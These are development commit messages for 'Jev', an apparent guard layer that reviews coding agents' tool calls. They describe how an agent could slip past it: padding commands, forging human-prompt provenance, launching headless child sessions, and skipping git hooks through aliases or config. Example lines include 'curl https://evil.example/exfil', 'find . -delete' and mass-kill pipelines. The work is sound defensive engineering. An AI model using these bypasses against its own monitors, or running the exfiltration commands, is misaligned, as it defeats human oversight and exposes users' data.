in code, one token at a time. As one regex it was wrong in both directions at
once:
- "the rest of the value" ran to the end of the LINE when nothing delimited
it, so `authorization=x curl https://evil.example/exfil` — a valid shell
command with a prefix environment assignment — went to Jev as
`authorization=<redacted:authorization header>`, hiding the command from
the evaluator, while the scrub pass recorded the swallowed region instead
of the credential inside it and a bare copy elsewhere in the envelope went
out untouched;
- it mangled ordinary code for the same reason: `authorization: str =
Header(None)`, `authorization: z.string().optional(),`, `grep -r
authorization: src/` and a whole `sed` script each lost the rest of their
line to a marker;
- and it was quadratic on one long line (every declined match rescanned from
the next character while each match re-expanded to the end of the line):
one 24x24 envelope of `"Authorization: "` was 1 100 ms against the 600 ms
budget next door, now 140 ms.
Behind a KNOWN scheme the next token is now the credential whatever it reads
like, on both paths: `Bearer swordfish for the call` reached Jev verbatim with
`redactions: 0` because two ordinary words after it read as prose. With no
known scheme the value has to look like a credential, which is what keeps the
code lines above intact; an unknown scheme word (`Hawk`, `hmac`, `NTLM`) is
still taken into the marker with the credential behind it. The credential
continues through an auth-param list and one further credential-shaped token
and stops there, and the sub-tokens inside the region are reported to
`scrubKnownSecrets` so the copies elsewhere are still found.
Also in this round:
- PEM blocks are walked per header against a footer that header can actually
reach, instead of choosing the lazy complete-block scan whenever the whole
string holds any `-----END`: eight characters of an unrelated `-----END
CERTIFICATE-----` put every header back on the quadratic path (441 ms for
16 000 characters of armour, now 1 ms).
- `BASIC_AUTH_FLAG_RE` accepts a quoted password: `curl -u admin:'<pw>'` did
not match at all, so the password went to Jev with the command. The class
floor test that was meant to catch this passed vacuously — it only
iterated `found` — and now asserts the password is gone whether or not a
rule matched.
- A value that ends at the bracket closing the code around it
(`{"headers": {"Authorization: <key>"}}`) is redacted; the token used to
keep `"}}` and read as code.
Cost, per 2 000-character string and for a 24x24 envelope of them, all shapes
linear: `Authorization: ` 2.3 -> 0.4 ms and 1 081 -> 141 ms; armour lines with
a foreign footer 1.4 -> 0.1 ms; 16 000 characters 3 500 -> 1.9 ms.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Five review rounds tried to prove a prompt was typed by a person by reading the session transcript: the scheduling call that fired it, the scheduled-task entry, "is there a conversation at all", and finally a high-water mark over the transcript's device, inode, length and bytes. Each round the next reviewer found three more spellings of the same forgery, and twice a patch introduced a defect of its own. All of it reads a file the agent already has a shell over — it can truncate it, replace it, pad it past the read budget, or `cp` it at the start of its turn and `cp` it back at the end — so the whole mechanism is deleted rather than repaired. What decides now is what the harness itself hands the hook: the canonical event type, and the fields in the payload on the hook's stdin, which the agent cannot edit. `humanPromptText` is six branches, each with a one-line reason. Anything missing, empty, ambiguous or merely probable records nothing. Blunter and stricter, deliberately. Stated in the docs and here: - Claude Code moves from "recorded unless the transcript objects" to "recorded only when the payload says `source: "user"`", Claude Code's own name for the interactive composer. That field is declared in 2.1.280's hook-input schema and that build does not populate it, so Claude Code records NOTHING today and starts working, with no change here, on the first build that sends it. `sdk` is refused too: an agent can start its own `claude -p`. - Codex and Factory Droid are not capturable and record nothing at all. Codex fires this event in sub-agent threads whose prompts the parent agent wrote, droid is unverified for prompts the model arranges, and neither payload says which — only their JSONL did. - A call without the payload records nothing, for every harness, and a payload carrying `agent_id` at all is refused on every harness. - The session file holds prompts again and nothing else: no origin state, no transcript mark, and the retention window is back to the six-hour intent window instead of seven days. The cost of every one of those is the same and is only ever in the safe direction: with no recorded prompt Jev has no task to judge the call against, so it clears no reviewable policy and the beyond-the-task check stays off. Nothing is ever allowed because a prompt could not be captured. The transcript is still read for one thing, and never for origin: the agent's last visible message. That is agent-written by definition, Jev is told so, and it is never consent on its own. Tests: intent-capture-r8 replays every forgery rounds 4-7 reported — snapshot-and-restore at the mark and above it, `truncate -s $S`, truncate plus one well-formed turn, 4 MB of well-formed padding, the session whose first prompt named a transcript that did not exist yet, the empty and no-path openings, the cron-started session with an unreadable transcript, unlinking the session's own state file, and droid's JSONL — and each is refused by the payload instead. r7's test file is deleted with the machinery it pinned; r6's transcript and rollout describes now pin that the transcript changes no answer. Mutation-verified: turning the Claude gate off fails 23 tests, accepting `sdk` 2, reading a missing `source` as human 2, making Codex or droid capturable 9 each, dropping the `agent_id` check 4, falling back to a payload-less `prompt` 4, and dropping the gate 32 — each restored exactly afterwards. src/hooks/semantic/intent.ts loses 419 lines. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Five review rounds patched the exact padding spellings that were reported
and the next round found three more of the same class, twice introducing a
new defect on the way. This round closes the class by SIMPLIFYING, per the
orchestrator's design directive, which refines plan §4.
1. The envelope is built inside a HARD, DETERMINISTIC BUDGET.
- Object KEYS go through `cleanString` like values: capped
(`MAX_KEY_CHARS` = 128) and redacted. A key was the one uncapped
string left, which made it both a size channel (one 130,000-char key
-> `request-too-large` -> Jev's deny discarded -> allow) and an
unredacted leak/injection channel with `truncated` false.
- Container DEPTH (`MAX_DEPTH` = 3) and entries per container
(`MAX_KEYS` = 24) are capped; what is dropped becomes a marker.
- A TOTAL budget (`MAX_STATE_CHARS` = 40,000, counted in SERIALIZED
characters) is spent as the envelope is built, most-important field
first, so no field can starve another and the state has a fixed
ceiling however the call is shaped.
- Because a call cannot come out too big, `SHRINK_STEPS` and the
rebuild loop in `prepareSemantic` are DELETED rather than guarded.
`request-too-large` survives only for our own questions (~13,000
characters against a 120,000 budget), which a test pins.
2. Building the envelope NEVER throws. No `JSON.stringify` of a
caller-shaped subtree (that was a RangeError at ~50,000 nesting, and a
`degraded("prepare: …")` is a discarded verdict), no unbounded
recursion, no assumption a value is representable: a bigint, symbol,
function, cycle, throwing getter or exotic proxy each becomes a short
marker. Control characters and unpaired surrogates are replaced with a
space, so a character cannot cost six once serialized. `verdictLogRow`
gets the same treatment — it runs inside the promise chain that
produces the review, so a raise there also dropped the verdict.
3. Truncation still constrains what Jev may DO, never whether it is asked
(unchanged from 56d30f9, now with no size or prepare escape hatch):
the request is sent, the verdict counts for deny and instruct, no
reviewable policy is cleared, no regex deny is downgraded, and the
activity row records `jev-fallback` / `truncated`. A genuine transport
failure (timeout, 429, 402, 5xx, malformed, model mismatch) still
falls back to the full regex result exactly as §4 says.
4. Local checks run on the same evidence Jev judged, without importing
its caps. `buildEnvelope` now reports the WINDOW it carried
(`Envelope.evidence`) with the text UNCUT. Reading the capped strings
back out of the envelope had fixed one hole (a dropped turn supplying
consent) and opened another: `targetNamedByUser` is a substring
search, so a target named in the cut middle of a 3,000-character
prompt stopped being found and an explicit user request became an
instruct or a deny. Both halves now hold by construction.
5. When the judged command IS cut, `agent_request.command_tokens` carries
a deduplicated skeleton of the WHOLE command (whitespace scan, head
and tail, own sub-budget). The open blocker was padding on BOTH sides
of the dangerous part — `echo <1250 x> ; find . -delete ; echo <850 y>`
put it in the head/tail cap's dropped middle, so Jev was asked about
padding, answered allow, and there was no deny left to protect. It now
denies at 1,250, 5,000, 100,000 and 1,000,000 characters of padding per
side. A token over 64 characters keeps its LENGTH and none of its text,
so the skeleton cannot hand SECRET_PATTERNS a fragment of a credential.
Blunter or stricter, deliberately, and written into the module docs:
- A key over 128 characters, a container over 24 entries and nesting past
depth 3 are cut on every call, not only on large ones.
- Substituting an unrepresentable value, or an object whose keys cannot be
read, now sets `truncated` — so such a call clears nothing.
- Control characters and unpaired surrogates in what Jev sees become
spaces.
- Once the total budget is spent, later fields become markers even though
their own per-field caps would have allowed more.
NOT closed, and no longer claimed: a bounded projection of an unbounded
string always drops something and the attacker picks where, so a command
of thousands of DISTINCT tokens can still push its middle out of both the
text cap and the skeleton. The over-claims in `envelope.ts` and
`jev-review.ts` are replaced with what is actually true; the regex tier
reads the whole command and remains the floor.
Tests: new `__tests__/hooks/semantic/envelope-budget.test.ts` (115 cases)
pins the properties rather than the spellings — size, no-throw, per-string
caps, hostile non-tool-input, the verdict log, and the two-sided padding
repro against a transport that answers from what it can actually SEE.
Handler-level guards for the key and deep-nesting spellings, the latter
fed as raw stdin text because `JSON.stringify` raises on it while
`JSON.parse` does not. Verified failing: uncapped keys 13, no budget 7,
stringified subtree 5, no skeleton 3, capped-string evidence 3; each break
restored byte-identically.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…them
Five review rounds patched the reported spelling and the next reviewer found
three more of the same kind — twice with a new defect in the patch itself (a
regex compiled from the caller's own text that held the hook for 102 seconds
under Node, and nine false denies on ordinary pipelines). The readings were not
careless; they were undecidable. So they are gone, and each policy now turns on
ONE rule a reviewer can check by reading.
block-mass-kill reads the PROCESS LISTER and nothing else. Only the lister's own
options narrow a listing (`ps -p`, `ps -C my-daemon`, `pgrep -f my-worker`); what
happens between the listing and the kill — a grep pattern, an awk program, a sed
address, `tail -n +2`, `cat`, `tac`, `shuf`, `column`, a loop body — is not read
at all. `top`, a `/proc` scan and a bare `Get-Process` join `ps`/`pgrep`/`pidof`
as listers. A pattern is never compiled: `.` is read as one character by a
positional scan, and any other regex character makes the pattern one this does
not read, so it is treated as reaching everything.
block-no-verify decides on the command git will really run and fails CLOSED where
it cannot. Every way a command carries configuration — `-c`, `--config-env`,
`GIT_CONFIG_COUNT`/`KEY_n`/`VALUE_n`, `GIT_CONFIG_PARAMETERS`, a config file it
names, `include.path` — is one `ConfigSource`, judged by what it COULD be rather
than by however much of it happens to resolve. Builtin dispatch is matched
case-sensitively and alias lookup case-insensitively, the way git does it.
Closes, with the original repros: awk/sed selectors that match every `ps` row
(`/:/`, `/0/`), `tac`/`shuf`/`column`/`expand`, `$1 != "PID"`, `NF`, a positive
grep, `for p in $(pgrep node); do [ -n "$p" ] && kill $p; done`,
`git -c alias.COMMIT='commit --no-verify' COMMIT`, `GIT_CONFIG_KEY_0=alias.ci`,
`git -c "$C" ci`, and the ReDoS.
DELIBERATELY BLUNTER — each of these was allowed before and is denied now:
- any chain out of a listing of every process, however narrow the chain looks
(`ps aux | grep myapp | awk '{print $2}' | xargs kill`);
- a loop that checks each process before killing it, when the listing it walks is
broad (`for p in $(pgrep bash); do case … kill $p;; esac; done`);
- a pkill/killall pattern holding a group, class, alternation, repetition, anchor
or escape (`pkill 'my(a|b)pp'`, `pkill -f 'node.*worker'`, `pkill 'nod$'`);
- a commit or push under a setting the command does not state in full
(`git -c core.hooksPath=$H commit`, `GIT_CONFIG_GLOBAL=x.cfg git commit`).
The narrow spelling beside each one still runs, and the deny names it. Both
policies are off by default, so this costs one surprise at enable time.
Two denies relax, both for consistency: `git CONFIG core.hooksPath /dev/null`
(git ships no `CONFIG`, so nothing runs) and a `GIT_CONFIG_KEY_0=core.hooksPath`
whose stated value is an ordinary hooks directory, which matches `-c
core.hooksPath=.husky`.
False positives: 0 decision changes across the 815 real Bash commands in the
labelled corpus, for all six floor policies.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…g values
Five rounds decided where an `Authorization` value ENDS by looking at what it
contains — a scheme allowlist, a token shape, a "does this look like code"
test, a bounded token walk — and every round the next reviewer found three more
spellings the classifier declined with a live credential inside them. Twice the
repair introduced a new quadratic or a new over-redaction of its own. This
round removes the classifier instead of extending it.
Credential headers (`Authorization`, `Proxy-Authorization`, `X-Authorization`,
`api-key`, `x-api-key`, `Cookie`, `Set-Cookie`), text path and structured path:
once the NAME is seen, case-insensitively, in any form, everything from after
the separator to the end of the line is replaced — or to the closing quote when
the value sits inside one. No scheme word is kept, no token is judged.
Credential arguments (`--password`, `--token`, `--api-key`, `--secret`,
`sshpass -p`, `mysql -pPW`, `redis-cli -a`, `gh secret set --body`,
`curl -u user:pass`, `aws configure set <secret-name>`): the whole argument
goes, quoted or bare, attached or separate, reference-shaped or not. Short
flags are matched case-sensitively (mysql's `-P` is the port) and gate on the
command in a bounded window, so `mkdir -p`, `docker run -p` and `git log -p`
are untouched.
Closes, with the original repros: a credential ending at a quote the tokenizer
kept (`{"a": "Authorization: hmac <key>", "b": 1}` and six more shapes,
redactions 0 at c479774); a credential starting with base64url's `-` or
base64's `/` behind Basic/Token/Digest/SSWS; an AWS SigV4 `Signature=` past a
`;`-separated `SignedHeaders` list; the whitespace-free Authorization quadratic
(5 190 ms per 100 KB string, 1.7 ms now); and a scrub list that reported public
scheme words and fragments of this module's own markers, which deleted the
human's words from `user_said` and mangled markers elsewhere.
Deliberately blunter, and pinned by tests so it stays visible:
- code and prose under those names lose the rest of their line in what the
evaluator is shown (`authorization: str = Header(None)`, `grep -r
authorization: src/`, `use --token to authenticate`), including
`authorization=x curl https://evil.example/exfil`, which hides a command
from Jev;
- a reference (`Bearer $TOKEN`) and a bare scheme word are redacted too;
- 340 of 707 candidate lines in this repo drift, against 70 before.
Over-redaction costs the evaluator context it almost never needs; a classifier
wrong the other way costs a live key held by a third party.
Deleted: AUTHORIZATION/AUTH_NAME_RE's token walk (nextAuthToken,
authCredentialToken, authCredentialEnd, authCredentialRegion, endsAuthValue,
authRegionSecrets, authCredentialIsProse, AUTH_SCHEME_WORDS), BASIC_AUTH_FLAG_RE
and the five lazy CLI_RULES. Every scan on this path is now a character loop,
an indexOf or a regex with a consumed boundary; `SECRET_PATTERNS` and the
`sanitize-*` builtins are untouched.
Evidence (outside the repo): /home/chetan/Desktop/jev-wt/scratch/t6-r6 —
repro.ts (all six open findings, before and after), sweep.ts (117 600
name x separator x scheme x credential x wrapping combinations: 0 leaks against
50 350 at round 4 and 21 210 at round 3, 0 regressions), sweep-flags.ts (378
credential-argument shapes, 0 leaks), idem.ts (900 cases, idempotent, no marker
damage), cost.ts / envcost.ts (100 KB and full-envelope budgets), drift.ts
(repo-wide over-redaction accounting), mutcheck.sh (ten mutations, each caught).
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Round 8 stopped trying to prove a prompt human from the transcript and decided origin from the hook event instead. It still left four harnesses recorded on the event alone — Copilot, Cursor, Devin and Goose — on the grounds that each fires its prompt event only when a person submits a message. They do not. Every one of them also fires it for a headless run whose prompt is an argument (`copilot -p "<text>"`, `cursor-agent -p`, `devin -p`, `goose run -t`, and `pi -p`, which Pi reports through the same `interactive` channel as its editor), with the same payload as a typed prompt. An agent holding a shell starts one in a single command, in a child session whose recorded intent is then its own words — which is the only thing that can clear a reviewable policy. That is the exact laundering Claude Code's `source: "sdk"` is refused for. So the bar is the same everywhere now: the harness's own payload has to name the operator as this prompt's author. `PROMPT_CHANNELS` carries that as `namesOperator` — a predicate over the payload, or null for "not capturable" — so there is no "recorded on the event alone" any more, and no third answer to add a fifth spelling to. `humanPromptText` is six lines, each one a reason to record nothing. Blunter and stricter, deliberately: - Copilot, Cursor, Devin, Goose and Pi join Codex, Factory Droid, OpenCode, Antigravity and Hermes as not capturable. Only Claude Code's `source` and OpenClaw's run metadata name an author, and each is read only for its own harness: borrowing another harness's field changes nothing, because a channel with no mark has no branch that reads one. - No shipping build populates either field — Claude Code 2.1.280 declares `source` and does not send it, the OpenClaw plugin forwards no run metadata — so live intent capture records NOTHING on any harness today, and starts working with no change here on the first build that sends one. That is a deliberate product position, not an oversight, and the integrator note says so: the alternative is an ungated default an agent can drive with one command. - Cursor's `<user_query>` unwrapping is deleted with the recording it served, along with its oracle test. - `CaptureEvent.payload` is required and `prompt` is gone, so JEV-BUILD-PLAN §7's draft call shape no longer compiles. A payload- less call records nothing, which is indistinguishable from the intended behaviour on a harness that records nothing anyway, so the divergence has to be caught at the call site. Three tests pin it with `@ts-expect-error`; removing a directive fails `tsc`. The cost, corrected. This module's docs and the previous commit message both claimed that failing closed "can only make enforcement stricter". It never makes it weaker — with no recorded prompt Jev has no task to judge the call against, so no reviewable policy is ever cleared — but it is not free either: `compileRequest` asks the prompt-injection probe and the beyond-the-task questions only when `userSaid` is non-empty, so where nothing is recorded, a fired warn policy that injection would have escalated to a block stays a nudge, and the beyond-the-task flag never fires (verified against the real policy catalogue). The one-line fix is outside this task's area — ask INJECTION_PROBE regardless of `userSaid.length`, since that question is about text in the request envelope — and is named in the integrator notes. Tests: new intent-capture-r9 replays the reported blocker through the handler path, with the payloads the repo's own integration suite drives, for all seven headless-startable harnesses, plus Goose's `delegate` and scheduler shapes, Copilot's sidekick, a forged mark borrowed from another harness's schema, and every harness's shipped payload shape (all refused). The Claude Code control still records the composer and still refuses `sdk`. Mutation-verified: making Copilot, Cursor, Devin and Goose record on the event alone fails 17 tests, restoring Pi's channel gate 12, dropping the `agent_id` check 3, and not requiring the mark 26; each was restored exactly afterwards. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Round 6 stopped reading what a pipeline DOES to a process listing. The next
review found the same class one rewrite wide in what it still read — the ROUTE
from the listing to the kill, and the WORD an argument travelled in. So those
go too, and each policy now turns on two things a reviewer can check by
reading rather than by simulating a shell.
block-mass-kill reads (1) whether the command lists processes broadly and
(2) whether every kill in it names its targets the way the user typed them.
If it lists broadly and some kill does not, that is a deny — whatever is
written between them, and whether or not one feeds the other. Gone with the
route: the `pipedFrom` walk, the substitution scan, the assignment walk, the
per-analysis memos they needed, and the quadratic cost of walking a chain per
kill. One rule closes them all at once:
(ps -e -o pid=) | xargs kill a pair of parentheses
ps aux | while read u p; do kill $p; done the commonest spelling there is
ps -eo pid= | parallel kill one word in place of xargs
xargs kill < <(ps -e -o pid=) one token in place of the pipe
P=$(ps -e -o pid=); Q=$P; kill $Q one more assignment
block-no-verify decides on the argv the SHELL hands git, not on the words of
the command: one `argvOf` splits an unquoted expansion on whitespace exactly
as bash does and leaves a quoted one whole, and every check reads that. A
value with more than one word no longer walks past anything —
`A='commit --no-verify'; git $A -m x`, `F='-m x --no-verify'; git commit $F`,
`O='-c core.hooksPath=/dev/null'; git $O commit -m x` — and neither do
`X=aux; ps $X | xargs kill`, `A='-f node'; pkill $A` or `N='-1'; kill -9 $N`.
A `${X:-a b}` whose default is several words is read as a position the command
does not state, since resolution reads only its first word.
BLUNTER OR STRICTER, deliberately — all four are in the module header, the
catalog copy and the tests:
- A broad listing and a kill that names no PID in ONE command deny each other
even when they are unrelated (`ps aux > log; kill $SERVER_PID`). Was allowed.
- ANY `core.hooksPath` a commit or a push brings with it is a deny, whatever
its value. Checked against git 2.43 in a throwaway HOME: a repo whose
`pre-commit` rejected the plain commit committed under
`-c core.hooksPath=<empty dir>`, and no static read tells an empty hooks
directory from a populated one. `git config core.hooksPath .husky`, a
persistent write and not a commit, still runs.
- An unreadable word where a `-c` lives, in front of a subcommand git ships,
is a deny (`git $OPTS commit -m x`); the parse no longer abandons the rest
of the line on it. `git $S -m x` still runs: that word could be the
subcommand.
- `ps x` and `ps a` join `ps aux` as listings of every process.
Also closed: a `git config alias.nv 'commit --no-verify'` the command WRITES
and then uses (verified against git 2.43 — the plain commit was rejected,
`git nv` committed); `GIT_CONFIG_COUNT` slots past the sixteen that can be
read, which sixteen junk slots used to hide; and a `|` that ended no command
of its own, so `ps -e | ( xargs kill )` and `cmd |\n cmd` link again.
Measured: every finding repro from both review rounds denies (67/67); the
false-positive count over the 800 real Bash commands in labeled-1332 is
unchanged at 18, of which the two on allow-labelled rows come from
block-gh-destructive and block-disk-destruction, untouched here. Every shape
built to be expensive stays under 15 ms under node, including the selector
that once held the hook for 102 s.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Six review rounds found six spellings of ONE attack on the semantic tier: pad a tool call so the dangerous part lands in the window the envelope drops, and Jev answers about padding. Every round the fix was a better projection — a head-and-tail window, then a deduplicated token skeleton — and every round the next reviewer found three more spellings, because a bounded projection of an unbounded string always drops SOMETHING and the attacker picks what. The last round's residue, all reproduced at 41b516b before this change: * 70 DISTINCT short tokens per side (2,425 chars) hid `-delete` from Jev and flipped its deny to allow — dedup only defeats padding by repetition; * plain repetition on any field other than `command` (an MCP tool's `sql` or `script`, a `Write`'s `content`) did the same at 2,830 chars, because the skeleton was built for `input.command` only; * a `Write` of a PEM sent the key material: the shared pattern list matches the `-----BEGIN … PRIVATE KEY-----` header, which is right for a detector that denies and wrong for a transform, so the base64 body went out with `redactions: 1` making the call look audited; * ordinary shapes were reported cut — a 4-deep MCP body, a 25-edit MultiEdit — so they could never clear a reviewable deny; * `Envelope.evidence` reported the AGENT's message uncut, so consent found in a part of it Jev never read downgraded Jev's own deny; * a command over `MAX_SCAN_CHARS` was judged as the scanner's 8,192-character PREFIX, with nothing recorded — free hiding space; and the skeleton built from the raw text delivered quarantined shell comments back to Jev. So this stops trying to prevent the hiding, and takes the orchestrator's design directive instead (it refines plan §4 and §5, and is blunter than both). Two flags, one rule each: * `truncated` — anything was cut, context included. Withdraws every CLEAR, as before. * `requestCut` — the cut was inside `agent_request`. On top of withdrawing clears, such a call is DENIED unless something more severe already decided: in enforce mode it becomes `semantic/request-too-large-to-review`, whose reason says to split the call up. A regex deny and Jev's own deny both still outrank it and keep their own attribution. It sits ahead of the instruct branch on purpose — on most CLIs an instruct RUNS the call with a note, so leaving a cut call as an instruct would have made "pad it, and also trip any warn-level rule" the next spelling of the same attack. Hiding requires a cut; every way of dropping request bytes goes through one `markCut`; `requestCut` can only make a call stricter. Padding is therefore useless by construction rather than by spelling, and there is no next spelling to find. `__tests__/hooks/semantic/envelope-budget.test.ts` pins it as one property over sixteen burial shapes — "if the marker is not in the state, the envelope says the request was cut" — six of which really do hide it. Also in the envelope, all in service of the same rule: * two independent section budgets — `MAX_AGENT_REQUEST_CHARS` (56,000) for the call, `MAX_CONTEXT_CHARS` (32,000) for everything else — so neither can starve the other and the request's capacity never depends on how much context there was. The per-string cap was 2,000; the filed repros were 2,147–9,697 characters, i.e. all of them are now carried WHOLE and denied on the evidence rather than on the refusal; * no cap on how MANY entries a container has, and `MAX_DEPTH` raised to 64: the byte budget is the only bound, so the ONE thing a cut can mean is "it did not fit"; * a command past the scanner's horizon is judged whole, with `shell_comments_not_removed` saying its comments were not stripped — comment text in `command` is labelled truthfully, and `decide.ts` already guarantees no answer about planted text can produce an allow or a clear; * the tool NAME is charged to the request section, so cutting it is a cut of the call; * private keys are redacted LINE BY LINE — every base64 line inside a `-----BEGIN … PRIVATE KEY-----` block goes, everything else stays. Whole- block redaction would have made a fake key block a new hiding place, and the charsets of every other pattern cannot spell a command; * `evidence.agentLastMessage` is now the SENT text. The human's turns stay uncut (directive rule 3: a long prompt must not lose the consent it contains), because the human channel is the one that grants consent and the agent channel is the one the design treats as hostile. DELETED rather than left guarded: `commandTokens` and its skeleton, the `command_tokens` / `command_was_cut` state fields, `MAX_KEYS`, `MAX_TOKEN_CHARS`, `MAX_COMMAND_TOKENS_CHARS`, and every claim that the cheap spellings of padding were closed. DELIBERATELY BLUNTER, and disclosed rather than discovered: 1. A single tool call whose input serializes past ~56,000 characters is DENIED in enforce mode — a ~1,400-line `Write`, or a command two orders of magnitude longer than a real one — instead of being half-reviewed. The reason names the remedy. Shadow mode never denies, and an unconfigured machine never reaches this code. 2. The request sent to the BYOK provider can now be ~90,000 characters against 40,000 before, for the calls that are actually that big. Ordinary calls are unchanged (0.2 ms, 666 characters of state); the worst measured `prepareSemantic` is 2.4 ms. 3. A target named only in the cut middle of a long AGENT message no longer overrides a policy. That can add an instruct or a deny where the agent wrote 5,000 characters and the human replied "yes". 4. An oversized call that also trips a warn-level regex policy is denied rather than instructed, because an instruct is not a refusal. The refusal is attributed to this tier, not to a builtin: `decidedByJev` is what `handler.ts` reads to decide whether to look the deciding policy up in the registry, and an unfound name is reported as `policySource: "builtin"` — so the flag now means "this tier decided, not a registered policy", which is what its one consumer was always asking. Every original repro is re-run and closed in `__tests__/hooks/semantic/envelope-budget.test.ts`, `truncation-severity.test.ts`, `evaluator-sent-evidence.test.ts` and `two-tier-handler.test.ts` (end to end through the real handler, with a transport that answers from what is actually in `request.state` — the fakes that answer the same whatever they were sent are why five suites could not see any of this). Verified failing: removing the request-cut deny fails 7, restoring the 2,000-character cap fails 20, header-only key redaction fails 7, the raw agent message fails 3, and judging the scanner's prefix fails 6; each break was restored byte-identically. `bunx tsc --noEmit -p .` clean, `bun run lint` 0 errors (5 pre-existing `@next/next/no-img-element` warnings), full suite 5,575 passed / 10 skipped. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…only tokens
Round 6 made the credential rules blunt; the confirmation round found the
class still open in four places, plus three regressions the blunt rewrite
introduced. Same directive, no new classifier.
The name, in every form it is written:
- the two-argument setter form is a spelling of the separator, so
`req.Header.Set("Authorization", "<cred>")`, `headers.set`,
`setRequestHeader` and `[("x-api-key", "<cred>")]` are taken like any header
(they leaked verbatim in every round so far);
- a value on the NEXT line is taken too — a YAML block scalar
(`authorization: >-`), a folded HTTP header and a line-broken dict all
redacted the indicator and left the credential underneath, reporting
`redactions: 1`, which read as handled.
Two boundaries, both structural, neither asking what the value contains:
- an UNQUOTED value ends at the shell separator that starts a second command,
unless it has already taken a `name=` pair. `echo cookie: && curl
https://evil.example/exfil` hid the exfiltration behind a marker; a cookie
list and an unquoted SigV4 value (the credentials that legitimately hold
`;`) are still taken whole;
- a credential ARGUMENT ends at the quote that closes the string the command
sits in, so `{"command": "app --password <pw>"}` keeps its `"}` and records
the bare credential instead of `<pw>"}`.
The scrub list is the one place this file asks what a credential CONTAINS, and
it now asks: `scrubKnownSecrets` deletes what it is given from the whole state,
so reporting every piece of a blindly redacted region made it an
attacker-writable delete key — `echo cookie: ; rm -rf <path>` blanked
`facts.paths` and deleted the human's own words from `user_said`. Only an
opaque token is reported now (no whitespace, 8+ characters, token-shaped, not a
path, a URL, a reference or a marker), and three places that reported something
else are fixed: a cookie's credential is its FIRST piece (round 4 dropped it
while scrubbing the public `theme=dark` envelope-wide), the structured field
path reported `Bearer <tok>` rather than `<tok>`, and a floor entry that takes
the header name with the value (`Authorization: Bearer <tok>`) reported the
whole line. The credential-header field rule now runs ahead of the
secret-named-field rule for the same reason.
Cost: the reported `ASSIGNMENT_RE` quadratic is mitigated, not fixed. A string
holding none of `SECRET_NAME_HINTS` skips the three name-driven scans entirely
(an envelope of `a=a=a=…` 813 ms → 25 ms, against a 600 ms budget); a run that
does hold one still pays it (`key=a` 331 ms, worst found `a=key=` 538 ms) and
the structural fix is deferred. Every credential scan is linear: 100 KB of the
worst shape for each is 1-11 ms.
Blunter or stricter than before, deliberately:
- a list of header NAMES loses everything after the first entry
(`["Authorization", "Content-Type"]` reads as the setter form);
- a paragraph indented under `authorization:` is read as that header's value;
- a token-shaped PUBLIC value inside a credential header can still reach the
scrub list (`theme=dark-mode-v2` reports `dark-mode-v2`), which costs the
evaluator a word elsewhere and never leaks;
- a multi-word passphrase behind `--password` is no longer scrubbed
envelope-wide, because a phrase on that list deletes sentences.
Verified: 117 600-case header sweep and 378-case flag sweep, 0 leaks and 0
regressions against round 4; 900-case idempotency; every reviewer probe from
rounds 4-6 re-run; 12 mutations, each caught by its own new test.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
… a shell The user cut the floor to four: block-disk-destruction, block-gh-destructive, block-indirect-exec and block-chmod-777. block-mass-kill and block-no-verify are removed from this branch. Both of the removed ones had to decide what a shell would DO with the text between two programs, and seven review rounds showed that is not decidable from the command string. Every closure that needed no such model cost ordinary work: a broad listing and a kill naming no PID in one command denied `ps aux > log; kill $SERVER_PID`; a value-blind `core.hooksPath` denied `git -c core.hooksPath=.husky commit`, the spelling husky itself installs; and resolving aliases against config writes made block-no-verify quadratic in (config writes x git invocations) — 4.1 s on a 540 KB command, on a hook that runs before every tool call. A hard floor's deny is final, so a false positive there is the whole product; an unfixed exotic bypass is a documented gap. Deleted with them, because nothing else read it: the `Arg`/`argvOf` argv model and its IFS splitting, the process-lister and /proc scanning, ps/pgrep/killall option modelling, git alias resolution and expansion, `GIT_CONFIG_*` reading, and the audit's detector-duplicate dedupe (its only entry was block-no-verify). `splitsOnIfs` and the `quoted` flags on non-literal word parts go back out of shell-analysis.ts; the pipe-across-a-boundary fix stays, because a shell reading its program from a pipe (`echo 'mkfs /dev/sda' | ( bash )`) is read through it. What ships is four policies that each read one program's OWN arguments, through the same quote-aware analyser: the device a disk tool writes to, the noun and verb gh deletes, a destructive name reached through indirection, and the mode a chmod applies. No path compiles or runs text from the command. Measured on this commit: - 800 real Bash rows from labeled-1332: 17 denies, 2 of them on allow-labelled rows (`gh release delete … --cleanup-tag --yes`, `wipefs -a /dev/loop7`). Both pre-existing, both arguably correct on a hard floor, both from policies this commit does not touch. Slowest single evaluation over that corpus: 2 ms. - 500 KB commands under node: 5-22 ms for all four together, worst single policy 21 ms (the cost test pins 300 ms so a loaded CI box cannot flake it). - The densest shape I could build — 540 KB, 16k invocations, one `git config alias` and one `git -c … commit` every 34 bytes — goes from 1,730 ms at the parent to 80 ms here, of which 71 ms is the ONE shared `analyzeShell` pass every floor policy reads and the four policies themselves are 5 ms. block-no-verify alone was 1,638 ms of the parent's total. - The 14 ordinary commands the removed policies denied at the parent all allow here; that list is a test, not a note. Counts move 45 -> 43 builtins and 44 -> 42 pack policies in README, the 14 i18n READMEs, package.json, packs.mdx, quickstart.mdx and every pinning test. New tests: the ordinary commands the removed policies denied are now allowed by every shipped policy; a 500 KB command stays inside the bound; and a deny reason never carries a value the command only bound to a variable. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The last round closed the padding class by refusing a call it could not
read in full. That works, and it costs more than it protects: the
refusal fired on ordinary outsized work, and three other rules in the
same change decided verdicts on things that are not evidence about a
call. This round repairs all four without giving the security property
back.
REMOVED the `semantic/request-too-large-to-review` deny. A call whose
own text had to be cut is still asked about, its deny and instruct still
count, and it MAY NOT CLEAR a reviewable policy — but no refusal of our
own is invented. A ~1,400-line Write, a large MCP body and a long
generated migration all reached the old threshold, and a deny fired by
size on work no policy objected to spends exactly the benefit this tier
exists to deliver. `degraded("request-too-large")` is gone with it: the
request goes out with what fitted, and a body the provider really
cannot take degrades on its own error.
